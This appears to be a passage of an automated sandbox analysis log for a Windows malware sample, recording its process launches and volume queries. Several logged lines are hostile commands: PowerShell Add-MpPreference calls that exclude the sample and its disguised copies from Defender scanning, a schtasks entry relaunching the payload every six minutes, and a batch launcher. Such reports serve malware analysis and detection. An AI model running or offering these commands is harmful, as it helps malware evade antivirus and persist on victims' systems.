Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\opHipgZM6eS.exe'
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SfbAu0ICZn.exe'
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\CbsTemp\ctfmon.exe'	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe'	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\google\Update\Install\TMqwtuekPHF.exe'	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\opHipgZM6eS.exe'	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SfbAu0ICZn.exe'	Jump to behavior

Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\CbsTemp\ctfmon.exe'	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe'	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "opHipgZM6eSo" /sc MINUTE /mo 6 /tr "'C:\Recovery\opHipgZM6eS.exe'" /f	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\google\Update\Install\TMqwtuekPHF.exe'	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\opHipgZM6eS.exe'	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SfbAu0ICZn.exe'	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9stx3bi1r6.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\opHipgZM6eS.exe "C:\Recovery\opHipgZM6eS.exe"

Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Queries volume information: C:\Users\user\Desktop\SfbAu0ICZn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
